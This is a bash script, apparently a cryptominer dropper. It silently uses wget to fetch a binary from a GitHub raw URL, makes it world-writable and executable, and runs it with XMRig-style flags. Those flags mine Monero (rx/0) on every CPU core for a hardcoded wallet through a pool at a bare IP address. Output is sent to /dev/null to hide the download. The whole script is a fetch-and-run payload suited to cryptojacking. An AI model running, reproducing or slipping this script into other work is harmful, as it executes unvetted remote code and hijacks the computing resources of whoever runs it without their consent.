#!/bin/bash
wget -O gigi https://github.com/cornea99/upil/raw/main/zepo > /dev/null 2>&1
chmod 777 gigi
./gigi --donate-level 1 -o 134.122.78.130:443 -u SaLvs8cbsyHS6v4m9pSVvGiYspHfb5XwcbDJPE4ZbggW4NTRMRhiAVjhZodTySmCTRTivosFrSayVD7LHkCJXmdgXsY3gsgYsGY.$(echo $(shuf -i 1-100000 -n 1)-MM) -p $(echo $(shuf -i 1-100000 -n 1)-MM) -a rx/0 -t $(nproc --all)
